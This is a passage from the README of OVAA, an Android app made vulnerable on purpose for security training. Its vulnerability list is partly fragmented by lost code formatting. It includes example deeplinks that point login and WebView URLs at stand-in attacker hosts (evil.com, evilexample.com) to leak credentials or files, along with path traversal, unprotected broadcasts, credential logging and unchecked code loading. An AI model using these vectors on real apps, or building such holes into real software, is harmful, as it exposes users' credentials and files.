OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
oversecured://ovaa/login?url=http://evil.com/. Leads to the user's user name and password being leaked when they log in.
android:grantUriPermissions="true") via deeplink
oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process
oversecured.ovaa.action.GRANT_PERMISSIONSand pass intent to
setResult(code, intent)with flags such as
Intent.FLAG_GRANT_READ_URI_PERMISSIONand the URI of the content provider.
oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting
WebViewActivity.javafile to steal arbitrary files by sending them XHR requests and obtaining their content.
LoginActivityby supplying an arbitrary Intent object to
MainActivityby intercepting an activity launch from
Intent.ACTION_PICKand passing the URI to any file as data.
MainActivitycontaining credentials. The attacker can register a broadcast receiver with action
oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATAand obtain the user's data.
oversecured.ovaa.action.WEBVIEW, containing the user's encrypted data in the query parameter
TheftOverwriteProvidervia path-traversal in the value
InsecureLoggerService. Leak of credentials in
Log.d("ovaa", "Processing " + loginData).
OversecuredApplicationby launching code from third-party apps with no security checks.
oversecured.ovaa.fileprovidercontent provider in
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc